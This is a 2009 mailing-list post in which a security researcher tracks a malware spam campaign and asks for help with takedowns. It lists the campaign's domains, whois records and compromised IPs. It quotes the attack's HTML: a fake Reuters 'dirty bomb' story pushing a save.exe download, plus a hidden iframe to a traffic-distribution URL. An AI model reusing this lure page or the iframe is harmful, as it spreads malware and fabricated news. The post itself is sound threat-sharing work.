[nsp-sec] chatloveonline.com & breakinggoodnews.com & breakingfreemichigan.com
William Allen Simpson
william.allen.simpson at gmail.com
Tue Mar 17 09:09:30 EDT 2009
The good news is that Gmail is now flagging these messages as spam.
The bad news is that the number of domains and servers are expanding. A
common element still seems to be the chatloveonline.com iframe, so I've
swapped the subject line. But that could easily change.
Today's was yug.breakingfreemichigan.com, running with 6 nameservers at
ns[1-6].yug.breakingfreemichigan.com.
That's a little scarier, as they've managed to identify the victim's state
of residence before the spam, and then geo locate the city from the IP used.
Note that this is dynamic, correctly identifying Madison Heights yesterday,
and Ann Arbor today.
The whois for chatloveonline.com registration seems to be garbage data, yet
recently updated. All 3 so far are registered with ename.com.
CHATLOVEONLINE.COM
Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA ENAME CORP
Whois Server: whois.ename.com
Referral URL: http://www.ename.com
Name Server: NS1.EXTENDEDMAN.COM
Name Server: NS2.EXTENDEDMAN.COM
Name Server: NS3.EXTENDEDMAN.COM
Name Server: NS4.EXTENDEDMAN.COM
Name Server: NS5.EXTENDEDMAN.COM
Name Server: NS6.EXTENDEDMAN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 09-mar-2009
Creation Date: 04-feb-2009
Expiration Date: 04-feb-2010
Registrant Contact Information :
YANSHIYING
YANSHIYING
yanshi_ying at yeah.net
FUNANLU19, 200159
Anybody able to get these (and any related) taken down?
===
Presumably owned machines acting as servers this morning:
14 | 128.59.115.197 | COLUMBIA-GW - Columbia University
812 | 173.34.130.46 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.245.181.233 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.249.222.18 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.252.10.26 | ROGERS-CABLE - Rogers Cable Communications Inc.
1221 | 121.209.144.64 | ASN-TELSTRA Telstra Pty Ltd
2698 | 129.186.209.25 | IASTATE-AS - Iowa State University
2711 | 98.124.86.66 | SUNBELT-AS - Rock Hill Telephone Company
3292 | 83.89.97.253 | TDC TDC Data Networks
3909 | 151.118.171.138 | QWEST-AS-3908 - Qwest Communications Corporation
6200 | 131.193.142.31 | UIC-AS - University of Illinois at Chicago
6327 | 70.68.123.52 | SHAW - Shaw Communications Inc.
6327 | 70.76.134.197 | SHAW - Shaw Communications Inc.
6389 | 68.16.15.1 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
6389 | 68.216.78.3 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
6830 | 77.249.135.111 | UPC UPC Broadband
7015 | 24.147.196.253 | CCCH-AS2 - Comcast Cable Communications Holdings, Inc
7016 | 71.206.193.30 | CCCH-AS2 - Comcast Cable Communications Holdings, Inc
7132 | 70.245.252.127 | SBIS-AS - AT&T Internet Services
7132 | 70.246.86.11 | SBIS-AS - AT&T Internet Services
7132 | 70.249.154.52 | SBIS-AS - AT&T Internet Services
7132 | 70.252.131.45 | SBIS-AS - AT&T Internet Services
7132 | 76.203.33.216 | SBIS-AS - AT&T Internet Services
7132 | 76.205.126.137 | SBIS-AS - AT&T Internet Services
7132 | 76.236.69.163 | SBIS-AS - AT&T Internet Services
7132 | 99.131.48.198 | SBIS-AS - AT&T Internet Services
7132 | 99.144.91.222 | SBIS-AS - AT&T Internet Services
7725 | 24.99.38.6 | CCH-AS7 - Comcast Cable Communications Holdings, Inc
7725 | 67.191.184.79 | CCH-AS7 - Comcast Cable Communications Holdings, Inc
9116 | 87.70.231.80 | GOLDENLINES-ASN Golden Lines Main Autonomous System
10796 | 24.92.131.99 | SCRR-10796 - Road Runner HoldCo LLC
10796 | 65.24.134.224 | SCRR-10796 - Road Runner HoldCo LLC
10796 | 65.24.235.124 | SCRR-10796 - Road Runner HoldCo LLC
10994 | 24.94.137.22 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
10994 | 65.34.65.28 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
10994 | 97.96.204.18 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
11060 | 204.210.203.168 | NEO-RR-COM - Road Runner HoldCo LLC
11060 | 65.189.218.116 | NEO-RR-COM - Road Runner HoldCo LLC
11351 | 69.207.51.147 | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
11351 | 76.180.30.6 | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
11426 | 65.191.219.169 | SCRR-11426 - Road Runner HoldCo LLC
11426 | 66.56.181.65 | SCRR-11426 - Road Runner HoldCo LLC
11426 | 98.25.62.209 | SCRR-11426 - Road Runner HoldCo LLC
11427 | 24.174.99.179 | SCRR-11427 - Road Runner HoldCo LLC
11427 | 72.181.165.105 | SCRR-11427 - Road Runner HoldCo LLC
11427 | 76.186.106.166 | SCRR-11427 - Road Runner HoldCo LLC
11525 | 64.184.15.27 | HRTC - Hancock Rural Telephone Corp.
12083 | 76.73.221.58 | KNOLOGY-NET - Knology Holdings
12322 | 82.241.128.117 | PROXAD AS for Proxad/Free ISP
13490 | 72.241.120.170 | BUCKEYECABLEVISION - Buckeye Cablevision, Inc.
20001 | 76.83.231.58 | ROADRUNNER-WEST - Road Runner HoldCo LLC
20115 | 24.176.228.219 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 66.169.149.225 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 68.114.33.54 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 97.86.11.25 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 97.95.157.32 | CHARTER-NET-HKY-NC - Charter Communications
20214 | 66.176.52.22 | CCCH-AS6 - Comcast Cable Communications Holdings, Inc
20214 | 71.196.49.240 | CCCH-AS6 - Comcast Cable Communications Holdings, Inc
20231 | 24.167.202.202 | ROADRUNNER-CENTRAL - Road Runner HoldCo LLC
21502 | 82.216.30.25 | ASN-NUMERICABLE NUMERICABLE is a cable network operator in France, offering TV,VOICE and Internet services
21502 | 85.69.203.219 | ASN-NUMERICABLE NUMERICABLE is a cable network operator in France, offering TV,VOICE and Internet services
31042 | 89.216.193.102 | SERBIA-BROADBAND-AS Serbia Broadband Autonomous System
31042 | 89.216.234.116 | SERBIA-BROADBAND-AS Serbia Broadband Autonomous System
33287 | 24.0.61.23 | DNEO-OSP4 - Comcast Cable Communications, Inc.
33491 | 69.245.203.18 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 71.194.236.153 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.164.82 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.174.233 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.220.253.169 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.220.42.109 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33588 | 98.127.138.99 | BRESNAN-AS - Bresnan Communications, LLC.
33657 | 24.126.8.172 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33657 | 69.138.231.41 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33657 | 69.251.246.199 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33662 | 98.199.242.222 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33668 | 69.244.173.181 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33668 | 69.245.113.127 | DNEO-OSP7 - Comcast Cable Communications, Inc.
35807 | 93.100.121.202 | SKYNET-SPB-AS SkyNet LLC AS
36423 | 70.45.224.201 | SAN-JUAN-CABLE - San Juan Cable, LLC
41451 | 217.117.39.59 | TELEDIS-AS TELEDIS AS
===
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<TITLE>Reuters-United States: Terror attack in Ann Arbor</TITLE>
<META NAME="description" CONTENT="Reuters.com brings you the latest news from around the world, covering breaking news in business, finance, politics, entertainment, and more in video and pictures."></meta>
</head>
<body>
<table width="413" align="center" border="0">
<tr><td><img border="0" src="reu.gif"></td></tr>
<tr><td><b>Powerful explosion burst in Ann Arbor this morning.</b><br>
<br>
At least 12 people have been killed and more than 40 wounded in a bomb blast near market in Ann Arbor.
Authorities suggested that explosion was caused by "dirty" bomb. Police said the bomb was detonated from close by using electric cables.
"It was awful" said the eyewitness about blast that he heard from his shop. "It made the floor shake. So many people were running"<br>
Until now there has been no claim of responsibility.<br><br>
<a href="save.exe"><img border="0" src="vid.gif" alt="You need the latest Flash player to view video content. Click here to download."></a><br>
You need the latest Flash player to view video content. <a href="save.exe">Click here</a> to download.<br>
<br>
<br>
Related Links:<br>
<a href="http://en.wikipedia.org/wiki/Dirty_bomb">http://en.wikipedia.org/wiki/Dirty_bomb</a><br>
<a href="http://www.google.com/search?q=Ann Arbor+terror+attack">http://www.google.com/search?q=Ann Arbor+terror+attack</a><br>
</td></tr>
</table>
<iframe src="http://chatloveonline.com/tds/Sah7" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</body>
</html>
===
Return-Path: <>
Received: from wergvan ([87.226.228.26])
by mx.google.com with SMTP id 18si10231257gxk.53.2009.03.16.22.01.47;
Mon, 16 Mar 2009 22:01:51 -0700 (PDT)
Received-SPF: neutral (google.com: 87.226.228.26 is neither permitted nor denied by domain of wergvan) client-ip=87.226.228.26;
Authentication-Results: mx.google.com; spf=neutral (google.com: 87.226.228.26 is neither permitted nor denied by domain of wergvan) smtp.mail=
Received: from rpw ([237.49.168.72]) by wergvan with Microsoft SMTPSVC(6.0.3790.211); Tue, 17 Mar 2009 13:32:42 +0900
Message-ID: <002801c9a6b9$698cde50$ed31a848 at BUHGALTERrpw>
From: "Mag" <ruethema.livingston at sc.com>
To: <william.allen.simpson at gmail.com>
Subject: Are you in good health?
Date: Tue, 17 Mar 2009 13:24:54 +0900
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="windows-1250";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
I hope you are in good health http://yug.breakingfreemichigan.com/run.php
More information about the nsp-security
mailing list